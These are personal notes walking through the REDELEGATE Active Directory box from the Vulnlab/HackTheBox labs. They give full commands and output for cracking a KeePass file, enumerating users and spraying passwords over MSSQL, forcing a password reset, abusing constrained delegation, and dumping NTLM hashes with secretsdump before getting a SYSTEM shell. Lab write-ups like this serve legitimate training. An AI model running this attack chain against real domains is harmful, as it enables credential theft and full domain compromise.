Here are my notes on the REDELEGATE box from Vulnlab, which was deployed to Hackthebox.
REDELEGATE: 10.10.116.40
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 10-20-24 12:11AM 434 CyberAudit.txt
| 10-20-24 04:14AM 2622 Shared.kdbx
|_10-20-24 12:26AM 580 TrainingAgenda.txt
| ftp-syst:
|_ SYST: Windows_NT
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/FTP]
└─# cat CyberAudit.txt
OCTOBER 2024 AUDIT FINDINGS
[!] CyberSecurity Audit findings:
1) Weak User Passwords
2) Excessive Privilege assigned to users
3) Unused Active Directory objects
4) Dangerous Active Directory ACLs
[*] Remediation steps:
1) Prompt users to change their passwords: DONE
2) Check privileges for all users and remove high privileges: DONE
3) Remove unused objects in the domain: IN PROGRESS
4) Recheck ACLs: IN PROGRESS
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/FTP]
└─# cat TrainingAgenda.txt
EMPLOYEE CYBER AWARENESS TRAINING AGENDA (OCTOBER 2024)
Friday 4th October | 14.30 - 16.30 - 53 attendees
"Don't take the bait" - How to better understand phishing emails and what to do when you see one
Friday 11th October | 15.30 - 17.30 - 61 attendees
"Social Media and their dangers" - What happens to what you post online?
Friday 18th October | 11.30 - 13.30 - 7 attendees
"Weak Passwords" - Why "SeasonYear!" is not a good password #Interesting !, ask chatgpt to make a wordlist out of "SeasonYear!"
Friday 25th October | 9.30 - 12.30 - 29 attendees
"What now?" - Consequences of a cyber attack and how to mitigate them
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/FTP]
└─# kpcli --kdb Shared.kdbx
Provide the master password:
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/FTP]
└─# keepass2john Shared.kdbx > Shared.kdbx.hash
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/FTP]
└─# sudo leafpad Season-wordlist.txt #From ChatGPT.
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/FTP]
└─# john --wordlist=Season-wordlist.txt Shared.kdbx.hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 600000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Fall2024! (Shared)
1g 0:00:00:02 DONE (2024-11-25 12:53) 0.4219g/s 6.751p/s 6.751c/s 6.751C/s Spring2024!..fall24!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
GOT THE PASSWORD !
Fall2024!
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/FTP]
└─# kpcli --kdb Shared.kdbx
Provide the master password: *************************
KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.
kpcli:/> find .
Searching for "." ...
- 7 matches found and placed into /_found/
Would you like to list them now? [y/N]
=== Entries ===
0. FS01 Admin
1. FTP
2. KeyFob Combination
3. Payrol App
4. SQL Guest Access
5. Timesheet Manager
6. WEB01
kpcli:/> show -f 0
Path: /Shared/IT/
Title: FS01 Admin
Uname: Administrator
Pass: Spdv41gg4BlBgSYIW1gF
URL:
Notes:
kpcli:/> show -f 1
Path: /Shared/IT/
Title: FTP
Uname: FTPUser
Pass: SguPZBKdRyxWzvXRWy6U
URL:
Notes: Deprecated
kpcli:/> show -f 2
Path: /Shared/HelpDesk/
Title: KeyFob Combination
Uname:
Pass: 22331144
URL:
Notes:
kpcli:/> show -f 3
Path: /Shared/Finance/
Title: Payrol App
Uname: Payroll
Pass: cVkqz4bCM7kJRSNlgx2G
URL:
Notes:
kpcli:/> show -f 4
Path: /Shared/IT/
Title: SQL Guest Access
Uname: SQLGuest
Pass: zDPBpaF4FywlqIv11vii
URL:
Notes:
kpcli:/> show -f 5
Path: /Shared/Finance/
Title: Timesheet Manager
Uname: Timesheet
Pass: hMFS4I0Kj8Rcd62vqi5X
URL:
Notes:
kpcli:/> show -f 6
Path: /Shared/IT/
Title: WEB01
Uname: WordPress Panel
Pass: cn4KOEgsHqvKXPjEnSD9
URL:
Notes:
-Brute-Force doesn't work, don't bother !
53/tcp open domain Simple DNS Plus
REDELEGATE\Marie.Curie:Fall2024!
#FROM MSSQL.
bloodhound-python -c All -u Marie.Curie -p 'Fall2024!' -d redelegate.vl --dns-tcp -ns 10.10.116.40
BloodHound Data:
Marie.Curie -> Member of Help Desk Group -> ForceChangePassword -> Helen.Frost User -> CanPSREMOTE -> DC.REDELEGATE.VL:
net rpc password "Helen.Frost" 'Password123!' -U "REDELEGATE.VL"/"Marie.Curie"%'Fall2024!' -S 10.10.116.40
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/BLOOD]
└─# net rpc password "Helen.Frost" 'Password123!' -U "REDELEGATE.VL"/"Marie.Curie"%'Fall2024!' -S 10.10.116.40
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/BLOOD]
└─# crackmapexec winrm 10.10.116.40 -u Helen.Frost -p 'Password123!'
SMB 10.10.116.40 5985 DC [*] Windows 10.0 Build 20348 (name:DC) (domain:redelegate.vl)
HTTP 10.10.116.40 5985 DC [*] http://10.10.116.40:5985/wsman
WINRM 10.10.116.40 5985 DC [+] redelegate.vl\Helen.Frost:Password123! (Pwn3d!)
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
sudo gobuster dir -u http://10.10.116.40/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -x sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar #RABBIT HOLE = NOPE !
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://redelegate.vl/ -H "Host: FUZZ.redelegate.vl" --fs 703 #EMPTY = NOPE !
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-25 17:39:35Z)
135/tcp open msrpc Microsoft Windows RPC
#NOPE, NO RPC !
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
ldapv3 - NOPE unless account acquired !
445/tcp open microsoft-ds?
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/FTP]
└─# crackmapexec smb 10.10.116.40 -u "" -p "" --shares
SMB 10.10.116.40 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
SMB 10.10.116.40 445 DC [+] redelegate.vl\:
SMB 10.10.116.40 445 DC [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/FTP]
└─# crackmapexec smb 10.10.116.40 -u "Guest" -p "" --shares
SMB 10.10.116.40 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:redelegate.vl) (signing:True) (SMBv1:False)
SMB 10.10.116.40 445 DC [-] redelegate.vl\Guest: STATUS_ACCOUNT_DISABLED
#No Guest Account - NOPE !
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open mssql
#For MSSQL, try it blindly without relying on the NMAP or crackmapexec output, because sometimes it works and sometimes it doesn't.
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/FTP]
└─# hydra -L users.txt -P Season-wordlist.txt 10.10.116.40 mssql
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-25 13:49:49
[DATA] max 16 tasks per 1 server, overall 16 tasks, 440 login tries (l:8/p:55), ~28 tries per task
[DATA] attacking mssql://10.10.116.40:1433/
[1433][mssql] host: 10.10.116.40 login: SQLGuest password: zDPBpaF4FywlqIv11vii
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-25 13:50:00
#FROM Shared.kdbx.
Enumerating AD Domain and Domain Users with MSSQL:
mssqlclient.py SQLGuest:'zDPBpaF4FywlqIv11vii'@10.10.116.40
SELECT DEFAULT_DOMAIN();
SELECT SUSER_SID('REDELEGATE\Domain Admins')
b'010500000000000515000000a185deefb22433798d8e847a00020000'
Convert it into a readable string with PowerShell:
$BinarySID = "010500000000000515000000a185deefb22433798d8e847a00020000"
$SIDBytes = [byte[]]::new($BinarySID.Length / 2)
for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
$SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
}
$SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
$SID.Value
PS C:\WINDOWS\system32> $BinarySID = "010500000000000515000000a185deefb22433798d8e847a00020000"
PS C:\WINDOWS\system32> $SIDBytes = [byte[]]::new($BinarySID.Length / 2)
>>
PS C:\WINDOWS\system32> for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
>> $SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
>> }
PS C:\WINDOWS\system32> $SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
>>
PS C:\WINDOWS\system32> $SID.Value
S-1-5-21-4024337825-2033394866-2055507597-512
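The same conversion as an added Python example (not from the original notes): it decodes the binary SID the page obtained from SUSER_SID() into its textual form, performs the reverse direction that SQL Server's SID_BINARY() does, and splits off the RID; the constant and function names are my own.

```python
import struct

# Hex dump returned by SUSER_SID('REDELEGATE\Domain Admins') on this page (a binary SID).
DOMAIN_ADMINS_SID_HEX = "010500000000000515000000a185deefb22433798d8e847a00020000"


def sid_from_bytes(raw: bytes) -> str:
    """Decode a binary SID: revision(1) count(1) authority(6, big-endian)
    followed by count little-endian 32-bit sub-authorities."""
    if len(raw) < 8:
        raise ValueError("SID shorter than the 8-byte header")
    revision, count = raw[0], raw[1]
    if revision != 1 or count > 15:
        raise ValueError("unsupported revision or too many sub-authorities")
    if len(raw) != 8 + 4 * count:
        raise ValueError("sub-authority count does not match the data length")
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, raw, 8)
    return "-".join(["S", str(revision), str(authority), *map(str, subs)])


def sid_to_bytes(sid: str) -> bytes:
    """Inverse of sid_from_bytes: textual SID to the binary form SID_BINARY() produces."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError("not a textual SID")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if len(subs) > 15 or any(not 0 <= s <= 0xFFFFFFFF for s in subs):
        raise ValueError("bad sub-authorities")
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def split_rid(sid: str):
    """Split 'S-1-5-21-...-512' into (domain SID, RID); RID 512 is Domain Admins."""
    base, _, rid = sid.rpartition("-")
    return base, int(rid)


if __name__ == "__main__":
    text = sid_from_bytes(bytes.fromhex(DOMAIN_ADMINS_SID_HEX))
    print(text)             # S-1-5-21-4024337825-2033394866-2055507597-512
    print(split_rid(text))  # ('S-1-5-21-4024337825-2033394866-2055507597', 512)
```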
Take that $SID.Value into a quick bash loop script to enumerate AD Domain Users: #Strip the last component (the RID, e.g. 512) first.
#!/bin/bash
USERNAME="sqlguest"
PASSWORD="***"
SERVER="redelegate.vl"
SID_BASE="S-1-5-21-4024337825-2033394866-2055507597"
for SID in {1100..1200}; do
QUERY="SELECT SUSER_SNAME(SID_BINARY(N'$SID_BASE-$SID'))"
echo "$QUERY" > query.sql
mssqlclient.py "$USERNAME:$PASSWORD@$SERVER" -file query.sql | grep -a REDELEGATE
rm query.sql
done
EXAMPLE:
#!/bin/bash
USERNAME="sqlguest"
PASSWORD="zDPBpaF4FywlqIv11vii"
SERVER="redelegate.vl"
SID_BASE="S-1-5-21-4024337825-2033394866-2055507597"
for SID in {1100..1200}; do
QUERY="SELECT SUSER_SNAME(SID_BINARY(N'$SID_BASE-$SID'))"
echo "$QUERY" > query.sql
mssqlclient.py "$USERNAME:$PASSWORD@$SERVER" -file query.sql | grep -a REDELEGATE
rm query.sql
done
bash loop.sh > users.txt
┌──(root㉿kali)-[/home/kali/VL/REDELEGATE/10.10.116.40]
└─# cat users.txt
REDELEGATE\FS01$
REDELEGATE\Christine.Flanders
REDELEGATE\Marie.Curie
REDELEGATE\Helen.Frost
REDELEGATE\Michael.Pontiac
REDELEGATE\Mallory.Roberts
REDELEGATE\James.Dinkleberg
REDELEGATE\Helpdesk
REDELEGATE\IT
REDELEGATE\Finance
REDELEGATE\DnsAdmins
REDELEGATE\DnsUpdateProxy
REDELEGATE\Ryan.Cooper
REDELEGATE\sql_svc
crackmapexec smb 10.10.116.40 -u users.txt -p Season-wordlist.txt --continue-on-success | grep "[+]"
SMB 10.10.116.40 445 DC [+] REDELEGATE\Marie.Curie:Fall2024!
Got Marie.Curie Credential !
REDELEGATE\Marie.Curie:Fall2024!
https://vuln.dev/vulnlab-redelegate/#getting-a-foothold
Hacking SQL Server Procedures – Part 4: Enumerating Domain Accounts
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: redelegate.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: REDELEGATE
| NetBIOS_Domain_Name: REDELEGATE
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
5985/tcp open wsman
#FROM BloodHound-Data:
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/BLOOD]
└─# crackmapexec winrm 10.10.116.40 -u Helen.Frost -p 'Password123!'
SMB 10.10.116.40 5985 DC [*] Windows 10.0 Build 20348 (name:DC) (domain:redelegate.vl)
HTTP 10.10.116.40 5985 DC [*] http://10.10.116.40:5985/wsman
WINRM 10.10.116.40 5985 DC [+] redelegate.vl\Helen.Frost:Password123! (Pwn3d!)
evil-winrm -i 10.10.116.40 -u Helen.Frost -p 'Password123!'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> whoami
redelegate\helen.frost
*Evil-WinRM* PS C:\Users\Helen.Frost\Documents> hostname
dc
USER-SHELL !
*Evil-WinRM* PS C:\Users\Helen.Frost\Desktop> whoami
redelegate\helen.frost
*Evil-WinRM* PS C:\Users\Helen.Frost\Desktop> hostname
dc
*Evil-WinRM* PS C:\Users\Helen.Frost\Desktop> dir
Directory: C:\Users\Helen.Frost\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/30/2024 9:05 AM 36 user.txt
*Evil-WinRM* PS C:\Users\Helen.Frost\Desktop> type user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
PRIV ESC:
Helen.Frost: whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeEnableDelegationPrivilege with computer object FS01$ Priv Esc: #Useful if we cannot create a computer account or use RBCD attack techniques.
BloodHound Data:
Helen.Frost -> GenericAll -> FS01$ <-- #This is a requirement for the priv esc to work.
Kali:
changepasswd.py redelegate/'fs01$'@redelegate.vl -newpass 'Start123!' -altuser redelegate/helen.frost -reset -altpass 'Start123!' -debug
changepasswd.py redelegate/'fs01$'@redelegate.vl -newpass 'Password123!' -altuser redelegate/helen.frost -reset -altpass 'Password123!' -debug
Target:
Set-ADObject -Identity "CN=FS01,CN=COMPUTERS,DC=REDELEGATE,DC=VL" -Add @{"msDS-AllowedToDelegateTo"="ldap/dc.redelegate.vl"}
Set-ADAccountControl -Identity "FS01$" -TrustedToAuthForDelegation $True
Kali:
getST.py redelegate.vl/fs01\$:'Password123!' -spn ldap/dc.redelegate.vl -impersonate dc
export KRB5CCNAME=dc.ccache
secretsdump.py -k -no-pass dc.redelegate.vl -dc-ip 10.10.116.40
https://vuln.dev/vulnlab-redelegate/#privilege-escalation
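A defender-side check for the condition this escalation relies on, added here as an example and not part of the original notes: it reads userAccountControl and msDS-AllowedToDelegateTo the way an auditor would pull them from LDAP and flags accounts with protocol transition enabled (the bit that Set-ADAccountControl -TrustedToAuthForDelegation sets). The sample records, the SRV02$ name and the function names are constructed.

```python
# userAccountControl bits (Active Directory schema values) relevant to Kerberos delegation.
TRUSTED_FOR_DELEGATION = 0x00080000          # unconstrained delegation
NOT_DELEGATED = 0x00100000                   # "account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x01000000  # constrained delegation with protocol transition
WORKSTATION_TRUST_ACCOUNT = 0x00001000
NORMAL_ACCOUNT = 0x00000200

# Service classes where impersonation reaches directory or host administration.
SENSITIVE_SERVICES = ("ldap", "cifs", "host", "http")


def audit_delegation(entries):
    """Return (sAMAccountName, finding) pairs for accounts whose delegation settings
    let them obtain service tickets on behalf of other users.

    Each entry is a dict with 'sAMAccountName', 'userAccountControl' (int) and an
    optional 'msDS-AllowedToDelegateTo' list of SPNs."""
    findings = []
    for e in entries:
        name = e["sAMAccountName"]
        uac = e["userAccountControl"]
        targets = e.get("msDS-AllowedToDelegateTo", [])
        if uac & TRUSTED_FOR_DELEGATION:
            findings.append((name, "unconstrained delegation"))
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            # Protocol transition: the account can request tickets for any user that
            # is not marked NOT_DELEGATED / in Protected Users, towards these SPNs.
            hot = [t for t in targets if t.split("/", 1)[0].lower() in SENSITIVE_SERVICES]
            severity = "CRITICAL" if hot else "HIGH"
            findings.append((name, "%s: protocol transition enabled towards %s"
                             % (severity, ", ".join(targets) or "<no SPN>")))
    return findings


# Constructed sample records: FS01$ as it looks after the Set-ADObject/Set-ADAccountControl
# changes above, a computer with no delegation, and an admin protected by NOT_DELEGATED.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "FS01$",
     "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["ldap/dc.redelegate.vl"]},
    {"sAMAccountName": "SRV02$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT},
    {"sAMAccountName": "Administrator", "userAccountControl": NORMAL_ACCOUNT | NOT_DELEGATED},
]

if __name__ == "__main__":
    for account, finding in audit_delegation(SAMPLE_ENTRIES):
        print(account, finding)
```

Setting NOT_DELEGATED (or Protected Users membership) on privileged accounts is the mitigation that stops the impersonation step even when a computer object has been misconfigured this way.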
┌──(root㉿kali)-[/home/…/VL/REDELEGATE/10.10.116.40/BLOOD]
└─# secretsdump.py -k -no-pass dc.redelegate.vl -dc-ip 10.10.116.40
/usr/local/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'secretsdump.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a066fbf49e79f43fffc449810227e399:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9288173d697316c718bb0f386046b102:::
Christine.Flanders:1104:aad3b435b51404eeaad3b435b51404ee:79581ad15ded4b9f3457dbfc35748ccf:::
Marie.Curie:1105:aad3b435b51404eeaad3b435b51404ee:a4bc00e2a5edcec18bd6266e6c47d455:::
psexec.py -hashes :a066fbf49e79f43fffc449810227e399 Administrator@10.10.116.40
/usr/local/bin/psexec.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.9.24.dev1+20210704.162046.29ad5792', 'psexec.py')
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.116.40.....
[*] Found writable share ADMIN$
[*] Uploading file PUuDcRvH.exe
[*] Opening SVCManager on 10.10.116.40.....
[*] Creating service juOH on 10.10.116.40.....
[*] Starting service juOH.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>hostname
dc
SYSTEM-SHELL !
C:\Users\Administrator\Desktop>whoami
nt authority\system
C:\Users\Administrator\Desktop>hostname
dc
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 604F-3743
Directory of C:\Users\Administrator\Desktop
10/30/2024 08:03 AM <DIR> .
10/20/2024 07:05 AM <DIR> ..
10/30/2024 08:04 AM 36 root.txt
1 File(s) 36 bytes
2 Dir(s) 9,447,956,480 bytes free
C:\Users\Administrator\Desktop>type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows